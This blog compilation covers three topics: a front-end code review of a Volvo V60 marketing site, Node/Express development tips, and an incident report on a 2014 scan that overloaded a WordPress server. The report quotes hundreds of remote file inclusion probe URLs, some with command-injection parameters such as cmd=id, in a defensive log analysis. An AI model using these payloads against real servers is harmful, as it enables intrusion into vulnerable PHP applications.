Unboxing the Wagon – peeking at code

A media buy on the Weather Channel website caught my eye. I want to see what makes http://www.thewagonunboxed.com/ tick.

Meta Tags

Nice to see Open Graph tags. I’m curious about how the html tag’s data attributes are used. Also good to see most of the JS isn’t loaded up here.

<html class="en desktop no-js" data-cache-key="http://www.thewagonunboxed.com/index.php|en|desktop" data-environment="production">
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title>THE WAGON. ÜNBOXED.</title>
  <meta name="description" content="Move in a new direction. See the All-New 2015 Volvo V60 Sportswagon. The perfect combination of power, performance and profile.">
  <meta property="og:title" content="THE WAGON. ÜNBOXED.">
  <meta property="og:type" content="website">
  <meta property="og:url" content="http://www.thewagonunboxed.com/index.php">
  <meta property="og:site_name" content="THE WAGON. ÜNBOXED.">
  <meta property="og:description" content="Move in a new direction. See the All-New 2015 Volvo V60 Sportswagon. The perfect combination of power, performance and profile.">
  <meta property="og:image" content="http://www.thewagonunboxed.com/img/common/volvo-logo-en-300.jpg">
  <meta name="viewport" content="width=device-width">
  <meta name="viewport" content="initial-scale=1.0, user-scalable=no">
  <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" type="text/css" href="http://volvo.cachefly.net/css/main.min.css">
    <link rel="stylesheet" type="text/css" href="//netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.min.css">
  <script src="//cdnjs.cloudflare.com/ajax/libs/modernizr/2.7.1/modernizr.min.js"></script>

Old browser? Nope!

Good call! Send users with weak browsers to another site. Beats building a fallback that barely delivers a good experience.

 if ( ! Modernizr.canvas || ! Modernizr.backgroundsize) {
    capable = false;
    window.location.replace('http://www.volvocars.com/en-ca/Pages/default.aspx');
  }

Google Analytics Data attributes?

I did not know this was a thing. Cool jquery plugin @ https://github.com/JimBobSquarePants/jQuery-Google-Analytics

<a
          href="https://www.facebook.com/volvocarsofcanada/app_242992689206644"
          class="pill-button"
          data-ga-hittype="event"
          data-ga-category="outgoing links"
          data-ga-action="click"
          data-ga-label="facebook contest"
        >Enter Now</a>

Pixi.js

Here’s another library I didn’t know about. It is for making fast 2D WebGL things with JS. Nice demos! https://github.com/GoodBoyDigital/pixi.js/

The Meat

Good on the team for minifying their JS in http://volvo.cachefly.net/js/v60.min.js. Running it through JS Beautify reveals about 1000 lines of JS which follows some good practices like not putting everything into the global scope and using requestFrame for animation.

File Sizes

Chrome’s Network inspector tells me the site downloads about 8.9mb when viewed in desktop sizes window, and 5.1mb when viewed in a phone-sized window. Most of that is images. Lots of transparent .pngs.

Here’s an interesting sprite sheet for vehicle colors: http://www.thewagonunboxed.com/img/vignette/chalet/car-colours.png

Car rotation images are biiiig: http://volvo.cachefly.net/img/features/exterior/red/1920/26.png

Things I wish I knew about Node + Express before making my first website with it

Develop with nodemon, deploy with forever

nodemon vs forever? More like nodemon AND forever! nodemon is live reload for Node apps. When it detects a file in your application has changed, it will restart your application for you. It does not require much configuration, and will save you many keystrokes and mouse clicks. My typical nodemon command looks like:

nodemon app.js --debug

It can also be used as part of a grunt command with grunt-nodemon.

Apps that restart well with nodemon will work better with forever. When your live application crashes despite all your unit tests passing, forever will automatically restart it. It offers more flexible logging, and can manage several nodejs apps at once. You can start an app with forever with a command like this:

forever start app.js

Waking up in the morning to see your Apache logs full of PHP errors isn’t fun, but the site may still be up and running. Waking up in the morning to see 1 error in your Node app brought the site down for hours is less fun. forever can help with that.

How to set environment variables

Environment variables are a good place to store private things like passwords and keys needed by your app. You don’t want those in your source code. I grew up using Windows, and didn’t know this method. Try running this command with nodejs installed:

NODE_ENV=debug DB_URL=mongodb://urlhere.ca STUFF=great node

This will start nodejs with environment variables named NODE_ENV, DB_URL, and STUFF set and ready to use. Type this command into the nodejs console next:

console.log(process.env)

You’ll see ENV, DB_URL, and STUFF included in the list other environment variables like PATH, ready to be used by your application. The variables will go away when the nodejs process ends. I find this very helpful when working on Heroku-hosted apps. Heroku uses environment variables for storing authentication info for many add-ons, and being able to duplicate those settings locally while developing brings me one step closer to matching their environment.

I have tested this out with nodemon and forever on Windows with the Git terminal as well as Linux, and it works in all cases.

NODE_ENV=production DB_URL=mongodb://urlhere.ca nodemon index.js

node-inspector will save you time

Look at this thing!

Breakpoints

Debugging Screenshot

Better logging

Console Screenshot

All for Node! You can’t want to use console.log() debugging after seeing this. It will save you time. I’m not even going to put an example here. Watch a screencast to get started.

Use async.js to prevent callback hell

Update 2015: Promises are more powerful, but a bit harder to understand, and Functional Reactive Streams is bigger step away from imperative programming.

Before you write your callback in a callback in a callback in a callback, try out async.js. It will force you to think harder about the input and output of your functions, reduce the amount of code you write, and probably improve the testability of your code as well.

Here’s how good NOT nesting callbacks 6 levels deep can look:

async.waterfall([
    // make raw Tweet into something useful
    contentTransformer.transformTweet.bind(this, tweet),
 
    // check the hashtags are valid
    entryChecker.hashtagMatch,
 
    // set the user_has_won property
    entryChecker.userHasWon,
 
    // save transformed Tweet to DB
    entriesController.save,
 
    // prepare to send a DM to the user
    twitterDirectMessager.send
], function (err, result) {
    util.log(TAG + 'saved a tweet. Err? ' + err);
});

Here are 5 function running in a waterfall pattern. I just have to put my functions in an array, make sure each returns the correct values, and async.waterfall takes care running them all or stopping when one returns an error, and running one last callback where I can log the result.

util.log() timestamps log messages. console.log() can log multiple objects at once

Use util.log() for messages that are going into logs. You’ll want the timestamps later to diagnose issues. Combine util.log with util.inspect() if you need to log detailed views of objects.

Use console.log() for quick and dirty checks when you forget you have node-inspector in your toolbox.

Automate running npm update after updating from version control

Hours have been wasted on this. Moving from wild files to package management is rad, but also means forming new habits. You probably won’t always notice if package.json changed in the last svn update or git pull, so why not just start running npm update by default?

Learn from boiler plate projects like MEAN and Tableau

Someone else made the hard decisions about what to name folders and files already. Tableau is a relatively lightweight example. MEAN is a stack that integrates Grunt, AngularJS, and Passport. Both packages include helpful examples.

Root users and Open File Limits

See my post on running node as a non-root user and raising open file limits to keep NodeJS web applications running smoothly and securely by using iptables and changing some Ubuntu configuration.

More things I wish I new about

  • File uploads with Express are more work than PHP and a good framework
  • Separate routes from controllers from business logic (like Laravel and other framesworks) makes for easier testing.

Jan 1, 2014 WordPress Attack

Summary

I site I monitor saw 1185 requests from 94.138.x.x between Jan 01 05:32:41 & 06:21:09 UTC looking for non existant pages. This site runs a small server, and WordPress tried to handle the errors in its slow and complicated way. As a result, Apache and MySQL were overloaded.

I believe the goal of the attack was to identify vulnerable software on the web server. Taking the server down was a side effect.

Error log samples

[Wed Jan 01 05:56:19 2014] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Wed Jan 01 06:16:44 2014] [error] [client 50.31.164.139] WordPress database err or MySQL server has gone away for query UPDATE `wp_options` SET `option_value` = 'a:3:{i:0;b:0;s:43:\\"events-calendar-pro/events-calendar-pro.php\\";s:19:\\"tribe_ecp_uninstall\\";s:39:\\"options-framework/options-framework.php\\";s:31:\\"optionsframework_delete_options\\";}' WHERE `option_name` = 'uninstall_plugins'made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), include_once('/plugins/options-framework/options-framework.php'), register_uninstall_hook, update_option

Apache was unable to fork new processes, and MySQL stopped responding.

Useful commands

I found some helpful bash commands on various blogs for searching through Apache logs. These were particularity handy

Count rows with IP address

cat access.log | grep 94.138.208.58 | wc -l

Get rows with an IP address

cat access.log | grep 94.138.208.58

Get just URLs requested

cat access.log | grep 94.138.208.58 | sudo awk -F\" '{print $2}' < ~/jan01-badreqs.txt

Solutions:

I’ve added some lines to .htaccess to block WordPress from handling certain requests which I know will result in 404s. Apache will send a 404 response right away, before PHP handles the request.

Fail2Ban would also be a good idea. It could detect a user accessing more than some number of URLs resulting in 404s, and block them from accessing the site temporarily.

Some URLS requested during the attack

/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=http://www.google.com/humans.txt?
/123flashchat.php?e107path=http://www.google.com/humans.txt?
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.google.com/humans.txt?
/22_ultimate/templates/header.php?mainpath=http://www.google.com/humans.txt?
/=http://www.google.com/humans.txt?
/?_CONFIG[files][functions_page]=http://www.google.com/humans.txt?
/A-Blog/navigation/donation.php?navigation_start=http://www.google.com/humans.txt?
/?_SERVER[DOCUMENT_ROOT]=http://www.google.com/humans.txt?
/?npage=-1&content_dir=http://www.google.com/humans.txt?%00&cmd=ls
/A-Blog/navigation/links.php?navigation_start=http://www.google.com/humans.txt?
/A-Blog/sources/myaccount.php?open_box=http://www.google.com/humans.txt?
/A-Blog/navigation/latestnews.php?navigation_start=http://www.google.com/humans.txt?
/A-Blog/navigation/search.php?navigation_end=http://www.google.com/humans.txt?
/?show=http://www.google.com/humans.txt?
/?npage=1&content_dir=http://www.google.com/humans.txt?%00&cmd=ls
/ATutor/documentation/common/frame_toc.php?section=http://www.google.com/humans.txt?
/ATutor/include/classes/module/module.class.php?row[dir_name]=http://www.google.com/humans.txt?
/ACGVnews/header.php?PathNews=http://www.google.com/humans.txt?
/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=http://www.google.com/humans.txt?
/Administration/Includes/contentHome.php?path_prefix=http://www.google.com/humans.txt?
/ATutor/documentation/common/search.php?section=http://www.google.com/humans.txt?
/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=http://www.google.com/humans.txt?
/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=http://www.google.com/humans.txt?
/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=http://www.google.com/humans.txt?
/BPNEWS/bn_smrep1.php?bnrep=http://www.google.com/humans.txt?&
/Bcwb_PATH/system/default.css.php?root_path_admin=http://www.google.com/humans.txt?
/Administration/Includes/userHome.php?path_prefix=http://www.google.com/humans.txt?
/ATutor/documentation/common/vitals.inc.php?req_lang=http://www.google.com/humans.txt?
/BE_config.php?_PSL[classdir]=http://www.google.com/humans.txt?
/Administration/Includes/configureText.php?path_prefix=http://www.google.com/humans.txt?
/BetaBlockModules//Module/Module.php?path_prefix=http://www.google.com/humans.txt?
/Bcwb_PATH/dcontent/default.css.php?root_path_admin=http://www.google.com/humans.txt?
/Base/Application.php?pear_dir=http://www.google.com/humans.txt?
/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=http://www.google.com/humans.txt?
/Administration/Includes/deleteUser.php?path_prefix=http://www.google.com/humans.txt?
/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=http://www.google.com/humans.txt?
/Beautifier/Core.php?BEAUT_PATH=http://www.google.com/humans.txt?
/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=http://www.google.com/humans.txt?
/Bcwb_PATH/include/startup.inc.php?root_path_admin=http://www.google.com/humans.txt?
/Administration/Includes/deleteContent.php?path_prefix=http://www.google.com/humans.txt?
/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=http://www.google.com/humans.txt?
/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=http://www.google.com/humans.txt?
/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=http://www.google.com/humans.txt?
/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=http://www.google.com/humans.txt?
/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=http://www.google.com/humans.txt?
/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=http://www.google.com/humans.txt?
/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=http://www.google.com/humans.txt?
/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=http://www.google.com/humans.txt?
/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=http://www.google.com/humans.txt?
/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://www.google.com/humans.txt?admin
/BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=http://www.google.com/humans.txt?
/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=http://www.google.com/humans.txt?
/CheckUpload.php?Language=http://www.google.com/humans.txt?&cmd=ls
/Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://www.google.com/humans.txt?
/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.google.com/humans.txt?
/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://www.google.com/humans.txt?
/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=http://www.google.com/humans.txt?
/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=http://www.google.com/humans.txt?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.google.com/humans.txt?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=http://www.google.com/humans.txt?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=http://www.google.com/humans.txt?
/CoupleDB.php?Parametre=0&DataDirectory=http://www.google.com/humans.txt?
/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=http://www.google.com/humans.txt?
/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=http://www.google.com/humans.txt?
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=http://www.google.com/humans.txt?
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=http://www.google.com/humans.txt?
/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=http://www.google.com/humans.txt?
/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=http://www.google.com/humans.txt?
/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=http://www.google.com/humans.txt?
/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]http://www.google.com/humans.txt?
/DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=http://www.google.com/humans.txt?
/DON3/applications/frontpage.don3app/frontpage.php?app_path=http://www.google.com/humans.txt?
/Dir_phNNTP/article-raw.php?file_newsportal=http://www.google.com/humans.txt?
/DynaTracker_v151/action.php?base_path=http://www.google.com/humans.txt?
/DynaTracker_v151/includes_handler.php?base_path=http://www.google.com/humans.txt?
/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=http://www.google.com/humans.txt?
/Ex/modules/threadstop/threadstop.php?exbb[home_path]=http://www.google.com/humans.txt?
/Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=http://www.google.com/humans.txt?
/Exophpdesk_PATH/pipe.php?lang_file=http://www.google.com/humans.txt?
/FirstPost/block.php?Include=http://www.google.com/humans.txt?
/Flickrclient.php?path_prefix=http://www.google.com/humans.txt?
/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.google.com/humans.txt?
/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.google.com/humans.txt?
/Full_Release/include/body_comm.inc.php?content=http://www.google.com/humans.txt?
/Gallery/displayCategory.php?basepath=http://www.google.com/humans.txt?
/Include/lib.inc.php3?Include=http://www.google.com/humans.txt?
/Include/variables.php3?Include=http://www.google.com/humans.txt?
/Jobline/admin.jobline.php?mosConfig_absolute_path=http://www.google.com/humans.txt?
/ListRecords.php?lib_dir=http://www.google.com/humans.txt?&cmd=id
/Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=http://www.google.com/humans.txt?
/MOD_forum_fields_parse.php?phpbb_root_path=http://www.google.com/humans.txt?
/Mamblog/admin.mamblog.php?cfgfile=http://www.google.com/humans.txt?
/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=http://www.google.com/humans.txt?
/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.google.com/humans.txt?
/OpenSiteAdmin/indexFooter.php?path=http://www.google.com/humans.txt?%00
/OpenSiteAdmin/pages/pageHeader.php?path=http://www.google.com/humans.txt?
/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=http://www.google.com/humans.txt?%00
/OpenSiteAdmin/scripts/classes/FieldManager.php?path=http://www.google.com/humans.txt?%00
/OpenSiteAdmin/scripts/classes/Filter.php?path=http://www.google.com/humans.txt?%00
/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=http://www.google.com/humans.txt?%00
/OpenSiteAdmin/scripts/classes/Form.php?path=http://www.google.com/humans.txt?%00
/OpenSiteAdmin/scripts/classes/FormManager.php?path=http://www.google.com/humans.txt?%00
/OpenSiteAdmin/scripts/classes/LoginManager.php?path=http://www.google.com/humans.txt?%00
/PHP/includes/header.inc.php?root=http://www.google.com/humans.txt?
/PHPDJ_v05/dj/djpage.php?page=http://www.google.com/humans.txt?
/PaTh/index.php?rootpath=http://www.google.com/humans.txt?
/Path_Script/createurl.php?formurl=http://www.google.com/humans.txt?
/PhotoCart/adminprint.php?admin_folder=http://www.google.com/humans.txt?
/Picssolution/install/config.php?path=http://www.google.com/humans.txt?
/RGboard/include/footer.php?_path[counter]=http://www.google.com/humans.txt?
/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=http://www.google.com/humans.txt?
/SQuery/lib/gore.php?libpath=http://www.google.com/humans.txt?
/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=http://www.google.com/humans.txt?
/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=http://www.google.com/humans.txt?
/ScriptPage/source/includes/load_forum.php?mfh_root_path=http://www.google.com/humans.txt?
/ScriptPath/footers.php?tinybb_footers=http://www.google.com/humans.txt?
/ScriptPath/index.php?page=http://www.google.com/humans.txt?
/Script_Path/config.inc.php?_path=http://www.google.com/humans.txt?
/Scripts/app_and_readme/navigator/index.php?page=http://www.google.com/humans.txt?
/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://www.google.com/humans.txt?
/Somery/team.php?checkauth=http://www.google.com/humans.txt?
/Upload/install.php?skindir=http://www.google.com/humans.txt?
/Widgets/Base/Footer.php?sys_dir=http://www.google.com/humans.txt?
/Widgets/Base/widget.BifContainer.php?sys_dir=http://www.google.com/humans.txt?
/Widgets/Base/widget.BifRoot.php?sys_dir=http://www.google.com/humans.txt?
/Widgets/Base/widget.BifRoot2.php?sys_dir=http://www.google.com/humans.txt?
/Widgets/Base/widget.BifRoot3.php?sys_dir=http://www.google.com/humans.txt?
/Widgets/Base/widget.BifWarning.php?sys_dir=http://www.google.com/humans.txt?
/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=http://www.google.com/humans.txt?
/[path]/mybic_server.php?file=http://www.google.com/humans.txt?
/[path]/previewtheme.php?theme=1&inc_path=http://www.google.com/humans.txt?cmd
/_administration/securite.php?cfg[document_uri]=http://www.google.com/humans.txt?
/_blogadata/include/struct_admin.php?incl_page=http://www.google.com/humans.txt?
/_conf/_php-core/common-tpl-vars.php?admindir=http://www.google.com/humans.txt?
/_connect.php?root=http://www.google.com/humans.txt?
/_friendly/core/data/_load.php?friendly_path=http://www.google.com/humans.txt?
/_friendly/core/data/yaml.inc.php?friendly_path=http://www.google.com/humans.txt?
/_friendly/core/display/_load.php?friendly_path=http://www.google.com/humans.txt?
/_friendly/core/support/_load.php?friendly_path=http://www.google.com/humans.txt?
/_functions.php?prefix=http://www.google.com/humans.txt?
/_includes/settings.inc.php?approot=http://www.google.com/humans.txt?
/_theme/breadcrumb.php?rootBase=http://www.google.com/humans.txt?
/_wk/wk_lang.php?WK[wkPath]=http://www.google.com/humans.txt?
/abf_js.php?abs_pfad=http://www.google.com/humans.txt?&cmd=id
/about.php?CONFIG[MWCHAT_Libs]=http://www.google.com/humans.txt?
/about.php?bibtexrootrel=http://www.google.com/humans.txt?
/aboutinfo.php?bibtexrootrel=http://www.google.com/humans.txt?
/acc.php?page=http://www.google.com/humans.txt?
/access/login.php?path_to_root=http://www.google.com/humans.txt?
/account.php?insPath=http://www.google.com/humans.txt?
/accsess/login.php?path_to_root=http://www.google.com/humans.txt?
/active/components/xmlrpc/client.php?c[components]=http://www.google.com/humans.txt?
/ad_main.php?_mygamefile=http://www.google.com/humans.txt?
/add.cgi.php?blog_theme=http://www.google.com/humans.txt?
/add_link.php?blog_theme=http://www.google.com/humans.txt?
/addpost_newpoll.php?addpoll=preview&thispath=http://www.google.com/humans.txt?
/addressbook.php?GLOBALS[basedir]=http://www.google.com/humans.txt?
/addsite.php?returnpath=http://www.google.com/humans.txt?
/addvip.php?msetstr[\
/adm/krgourl.php?DOCUMENT_ROOT=http://www.google.com/humans.txt?
/adm/my_statistics.php?DOCUMENT_ROOT=http://www.google.com/humans.txt?
/admin.loudmouth.php?mainframe=http://www.google.com/humans.txt?
/admin.php?Madoa=http://www.google.com/humans.txt?
/admin.php?cal_dir=http://www.google.com/humans.txt?
/admin.php?env_dir=http://www.google.com/humans.txt?
/admin.php?lang=http://www.google.com/humans.txt?
/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.google.com/humans.txt?
/administrator/menu_add.php?site_absolute_path=http://www.google.com/humans.txt?
/administrator/menu_operation.php?site_absolute_path=http://www.google.com/humans.txt?
/adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=http://www.google.com/humans.txt?
/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=http://www.google.com/humans.txt?
/adodb/adodb-errorpear.inc.php?ourlinux_root_path=http://www.google.com/humans.txt?
/adodb/adodb-pear.inc.php?ourlinux_root_path=http://www.google.com/humans.txt?
/adodb/adodb.inc.php?path=http://www.google.com/humans.txt?
/advanced_comment_system/index.php?ACS_path=http://www.google.com/humans.txt?
/advanced_comment_system/admin.php?ACS_path=http://www.google.com/humans.txt?
/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=http://www.google.com/humans.txt?
/agenda.php3?rootagenda=http://www.google.com/humans.txt?
/agenda2.php3?rootagenda=http://www.google.com/humans.txt?
/aides/index.php?page=http://www.google.com/humans.txt?
/ains_main.php?ains_path=http://www.google.com/humans.txt?
/ajax/loadsplash.php?full_path=http://www.google.com/humans.txt?
/ajouter.php?include=http://www.google.com/humans.txt?
/akarru.gui/main_content.php?bm_content=http://www.google.com/humans.txt?
/akocomments.php?mosConfig_absolute_path=http://www.google.com/humans.txt?
/amazon/cart.php?cmd=add&asin=http://www.google.com/humans.txt?
/amazon/index.php?lang=http://www.google.com/humans.txt?
/amazon/info.php?asin=http://www.google.com/humans.txt?
/annonce.php?page=http://www.google.com/humans.txt?&cmd=id
/announcements.php?phpraid_dir=http://www.google.com/humans.txt?
/anzagien.php?config[root_ordner]=http://www.google.com/humans.txt?cmd=id
/apbn/templates/head.php?APB_SETTINGS[template_path]=http://www.google.com/humans.txt?
/api.php?t_path_core=http://www.google.com/humans.txt?&cmd=id
/apps/apps.php?app=http://www.google.com/humans.txt?
/appserv/main.php?appserv_root=http://www.google.com/humans.txt?
/arab3upload/customize.php?path=http://www.google.com/humans.txt?&cmd=pwd
/arab3upload/initialize.php?path=http://www.google.com/humans.txt?&cmd=pwd
/arash_lib/class/arash_gadmin.class.php?arashlib_dir=http://www.google.com/humans.txt?
/arash_lib/class/arash_sadmin.class.php?arashlib_dir=http://www.google.com/humans.txt?
/arash_lib/include/edit.inc.php?arashlib_dir=http://www.google.com/humans.txt?
/arash_lib/include/list_features.inc.php?arashlib_dir=http://www.google.com/humans.txt?
/archive.php?scriptpath=http://www.google.com/humans.txt?
/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=http://www.google.com/humans.txt?%00
/artlist.php?root_path=http://www.google.com/humans.txt?
/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=http://www.google.com/humans.txt?cmd
/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.google.com/humans.txt?
/athena.php?athena_dir=http://www.google.com/humans.txt?
/auction/auction_common.php?phpbb_root_path=http://www.google.com/humans.txt?
/auction/includes/converter.inc.php?include_path=http://www.google.com/humans.txt?
/auction/includes/messages.inc.php?include_path=http://www.google.com/humans.txt?
/auction/includes/settings.inc.php?include_path=http://www.google.com/humans.txt?
/auction/phpAdsNew/view.inc.php?phpAds_path=http://www.google.com/humans.txt?
/auth.cookie.inc.php?da_path=http://www.google.com/humans.txt?
/auth.header.inc.php?da_path=http://www.google.com/humans.txt?
/auth.sessions.inc.php?da_path=http://www.google.com/humans.txt?
/auth/auth.php?phpbb_root_path=http://www.google.com/humans.txt?
/auth/auth_phpbb/phpbb_root_path=http://www.google.com/humans.txt?
/authenticate.php?default_path_for_themes=http://www.google.com/humans.txt?
/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.google.com/humans.txt?
/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.google.com/humans.txt?
/auto_check_renewals.php?installed_config_file=http://www.google.com/humans.txt?cmd=ls
/autoindex.php?cfg_file=http://www.google.com/humans.txt?
/b2-tools/gm-2-b2.php?b2inc=http://www.google.com/humans.txt?
/b2verifauth.php?index=http://www.google.com/humans.txt?
/backend/addons/links/index.php?PATH=http://www.google.com/humans.txt?
/basebuilder/src/main.inc.php?mj_config[src_path]=http://www.google.com/humans.txt???
/bb_admin.php?includeFooter=http://www.google.com/humans.txt?
/beacon/language/1/splash.lang.php?languagePath=http://www.google.com/humans.txt?
/belegungsplan/jahresuebersicht.inc.php?root=http://www.google.com/humans.txt?
/belegungsplan/monatsuebersicht.inc.php?root=http://www.google.com/humans.txt?
/belegungsplan/tagesuebersicht.inc.php?root=http://www.google.com/humans.txt?
/belegungsplan/wochenuebersicht.inc.php?root=http://www.google.com/humans.txt?
/bemarket/postscript/postscript.php?p_mode=http://www.google.com/humans.txt?
/biblioteca/bib_form.php?CLASSPATH=http://www.google.com/humans.txt?
/biblioteca/bib_pldetails.php?CLASSPATH=http://www.google.com/humans.txt?
/biblioteca/bib_plform.php?CLASSPATH=http://www.google.com/humans.txt?
/biblioteca/lin_save.php?CLASSPATH=http://www.google.com/humans.txt?
/biblioteca/luo_form.php?CLASSPATH=http://www.google.com/humans.txt?
/biblioteca/luo_save.php?CLASSPATH=http://www.google.com/humans.txt?
/biblioteca/sog_form.php?CLASSPATH=http://www.google.com/humans.txt?
/biblioteca/sog_save.php?CLASSPATH=http://www.google.com/humans.txt?
/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=http://www.google.com/humans.txt?
/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=http://www.google.com/humans.txt?
/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=http://www.google.com/humans.txt?
/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=http://www.google.com/humans.txt?
/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://www.google.com/humans.txt?
/bild.php?config[root_ordner]=http://www.google.com/humans.txt?&cmd=id
/bin/qte_init.php?qte_root=http://www.google.com/humans.txt?
/bingoserver.php3?response_dir=http://www.google.com/humans.txt?
/block.php?Include=http://www.google.com/humans.txt?
/blocks/birthday.php?full_path=http://www.google.com/humans.txt?
/blocks/events.php?full_path=http://www.google.com/humans.txt?
/blocks/help.php?full_path=http://www.google.com/humans.txt?
/blogcms/admin/media.php?DIR_LIBS=http://www.google.com/humans.txt?
/blogcms/admin/xmlrpc/server.php?DIR_LIBS=http://www.google.com/humans.txt?
/blogcms/index.php?DIR_PLUGINS=http://www.google.com/humans.txt?
/board/post.php?qb_path=http://www.google.com/humans.txt?
/boitenews4/index.php?url_index=http://www.google.com/humans.txt?
/books/allbooks.php?home=http://www.google.com/humans.txt?
/books/home.php?home=http://www.google.com/humans.txt?
/books/mybooks.php?home=http://www.google.com/humans.txt?
/bp_ncom.php?bnrep=http://www.google.com/humans.txt?
/bp_news.php?bnrep=http://www.google.com/humans.txt?
/bridge/enigma/E2_header.inc.php?boarddir=http://www.google.com/humans.txt?
/bridge/yabbse.inc.php?sourcedir=http://www.google.com/humans.txt?
/bridges/SMF/logout.php?path_to_smf=http://www.google.com/humans.txt?
/bu/bu_cache.php?bu_dir=http://www.google.com/humans.txt?
/bu/bu_claro.php?bu_dir=http://www.google.com/humans.txt?
/bu/bu_parse.php?bu_dir=http://www.google.com/humans.txt?
/bu/process.php?bu_dir=http://www.google.com/humans.txt?
/buddy.php?CONFIG[MWCHAT_Libs]=http://www.google.com/humans.txt?
/builddb.php?env_dir=http://www.google.com/humans.txt?
/button/settings_sql.php?path=http://www.google.com/humans.txt?
/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://www.google.com/humans.txt?
/cal.func.php?dir_edge_lang=http://www.google.com/humans.txt?
/calcul-page.php?home=http://www.google.com/humans.txt?
/calendar.php?cfg_dir=http://www.google.com/humans.txt?
/calendar.php?lang=http://www.google.com/humans.txt?
/calendar.php?path_to_calendar=http://www.google.com/humans.txt?
/calendar.php?vwar_root=http://www.google.com/humans.txt?
/calendar/demo/index.php?date=&v=http://www.google.com/humans.txt?
/calendar/payment.php?insPath=http://www.google.com/humans.txt?
/calendario/cal_insert.php?CLASSPATH=http://www.google.com/humans.txt?
/calendario/cal_save.php?CLASSPATH=http://www.google.com/humans.txt?
/calendario/cal_saveactivity.php?CLASSPATH=http://www.google.com/humans.txt?
/cart.php?lang_list=http://www.google.com/humans.txt?
/cart_content.php?cart_isp_root=http://www.google.com/humans.txt?
